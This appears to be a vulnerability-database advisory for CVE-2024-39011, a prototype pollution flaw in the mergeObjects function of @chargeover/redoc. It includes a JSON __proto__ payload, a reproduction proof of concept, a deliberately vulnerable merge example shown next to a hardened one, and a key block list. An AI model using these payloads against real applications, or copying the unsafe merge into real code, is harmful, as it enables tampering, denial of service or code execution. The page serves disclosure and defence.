VYPR
Unrated severity · NVD Advisory · Published Jul 30, 2024 · Updated Aug 2, 2024

CVE-2024-39011

Description

Prototype pollution in @chargeover/redoc v2.0.9-rc.69 via mergeObjects allows attackers to modify Object.prototype, potentially leading to DoS, RCE, or XSS.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The package @chargeover/redoc version 2.0.9-rc.69 is vulnerable to prototype pollution through the function mergeObjects. An attacker can pass a crafted argument containing a `__proto__` key to this function, and the merge writes through that key into the built-in Object.prototype, injecting arbitrary properties into the prototype chain of every plain object in the process. A JSON payload is enough to carry the key: JSON.parse creates an own data property literally named `__proto__` rather than setting the object's prototype, so any merge that enumerates the source's keys sees it. The vulnerability is reachable wherever the application calls mergeObjects with user-controlled input. Only version 2.0.9-rc.69 is listed as affected [1].

Exploitation

An attacker needs to supply a specially crafted object (e.g., via a JSON payload containing {"__proto__":{"test":123}}) to the mergeObjects function. No authentication or special network position is required if the application passes untrusted data to this function. The provided proof-of-concept calls lib.mergeObjects(emptyObj, JSON.parse('{"__proto__":{"test":123}}')) and then inspects an unrelated object, victim, that was never passed to the merge: after the call, victim.__proto__ (that is, Object.prototype) carries the test property, which shows that every object in the process now inherits it [1].

Impact

Successful exploitation allows the attacker to modify the properties of all objects inheriting from Object.prototype. Depending on the application's use of these properties (gadgets), the impact can lead to arbitrary code execution (RCE), Denial of Service (DoS), cross-site scripting (XSS), or other unintended behaviors. The attacker can escalate the prototype pollution into more severe attacks by leveraging affected gadgets within the runtime environment [1].

Mitigation

As of the advisory publication date (2024-07-30), no patched version of @chargeover/redoc has been released. Users should monitor the vendor for a fix. If the library is not required, consider replacing it with an alternative that is not vulnerable. If immediate mitigation is needed, avoid passing untrusted data to mergeObjects, or validate inputs before the call so that the `__proto__`, `constructor` and `prototype` keys are rejected at every nesting level (filtering only `__proto__` is not sufficient, because a merge can also reach Object.prototype through `constructor.prototype`). The advisory does not list this CVE in the Known Exploited Vulnerabilities (KEV) catalog [1].

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • chargeover/redoc [description]
  • Redoc/Redoc [llm-fuzzy]
    Range: =2.0.9-rc.69

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing sanitization of `__proto__` keys in the `mergeObjects` function allows prototype pollution."

Attack vector

An attacker calls the `mergeObjects` function with a crafted object containing the special property `__proto__` [1]. Because the function does not sanitize or block `__proto__` keys, the merge operation pollutes `Object.prototype`, altering the behavior of all objects that inherit from it [1]. The attacker can then leverage this prototype pollution to achieve denial of service, remote code execution, or cross-site scripting, depending on available gadgets in the application [1].

Affected code

The vulnerable function is `mergeObjects` in the `@chargeover/redoc` package version 2.0.9-rc.69 [1]. The advisory does not specify the exact file path or line number within the package.

What the fix does

The advisory does not include a patch or remediation commit [1]. To close the vulnerability, the `mergeObjects` function must filter out or reject keys such as `__proto__`, `constructor`, and `prototype` during the merge process, preventing modification of `Object.prototype` [1].
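The vulnerable pattern and the fix described under Mitigation and What the fix does, as an added example that is not the @chargeover/redoc source (the advisory does not reproduce `mergeObjects`, and its real implementation may differ): `mergeObjectsUnsafe` is a hypothetical minimal recursive deep-merge showing how the own `__proto__` key produced by JSON.parse ends up writing into Object.prototype, `mergeObjectsSafe` is the hardened form that rejects `__proto__`, `constructor` and `prototype` and only recurses into properties the target owns, and `isDebugEnabled` stands in for an application gadget that honours an inherited flag. The payload is constructed, and all function names are illustrative.

```javascript
// Added example; not code from @chargeover/redoc. The package's real
// mergeObjects is not reproduced in the advisory, so mergeObjectsUnsafe is a
// hypothetical minimal deep-merge with the same class of defect.

const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable variant: JSON.parse('{"__proto__":{...}}') yields an *own* data
// property literally named "__proto__", so Object.keys() enumerates it. Reading
// target["__proto__"] on a plain object goes through the inherited accessor and
// returns Object.prototype, and the recursive call then writes into it.
function mergeObjectsUnsafe(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      mergeObjectsUnsafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened variant: drop the prototype-bearing keys outright and recurse only
// into properties the target itself owns, so no inherited accessor or object
// (such as Object.prototype) is ever used as a merge target.
function mergeObjectsSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!Object.hasOwn(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      mergeObjectsSafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hypothetical gadget: application code that reads a flag it never set on this
// particular object, so a value inherited from Object.prototype is honoured.
function isDebugEnabled(config) {
  return config.debug === true;
}

// Drives the advisory's PoC shape against a merge implementation and reports
// what happened. `victim` is never passed to the merge; it only observes the
// prototype chain. Cleanup runs in `finally` so repeated calls start clean.
function runAttack(merge) {
  const payload = JSON.parse('{"__proto__":{"debug":true}}'); // constructed attacker input
  const victim = {};
  try {
    merge({}, payload);
    return {
      polluted: Object.prototype.debug === true,
      gadgetFires: isDebugEnabled(victim),
      victimOwnsDebug: Object.hasOwn(victim, 'debug'),
    };
  } finally {
    delete Object.prototype.debug;
  }
}

console.log('unsafe merge:', runAttack(mergeObjectsUnsafe)); // polluted: true,  gadgetFires: true
console.log('safe merge:  ', runAttack(mergeObjectsSafe));   // polluted: false, gadgetFires: false
```

Switching the iteration helper does not help: `Object.keys`, `Object.entries` and `for...in` all enumerate the own `__proto__` key that JSON.parse creates, so the key has to be rejected explicitly. `constructor` and `prototype` are on the block list because merges that descend into `target.constructor.prototype` reach Object.prototype by a second route, and the `Object.hasOwn` check closes the general case of recursing into anything inherited.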

Preconditions

  • config: The application must import and call the vulnerable mergeObjects function from @chargeover/redoc v2.0.9-rc.69
  • input: The attacker must be able to supply a crafted JSON object containing a __proto__ key as an argument to mergeObjects

Reproduction

```javascript
(async () => {
  const lib = await import('@chargeover/redoc');
  // `victim` is never passed to mergeObjects; it is only inspected to show
  // that every object inherits the injected property.
  var victim = {};
  // First argument of the merge; the PoC only needs it to be a plain object.
  const emptyObj = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.mergeObjects(emptyObj, JSON.parse('{"__proto__":{"test":123}}'));
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Remove the injected property so the process is left clean.
  delete Object.prototype.test;
})();
```

Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions

0

No linked articles in our index yet.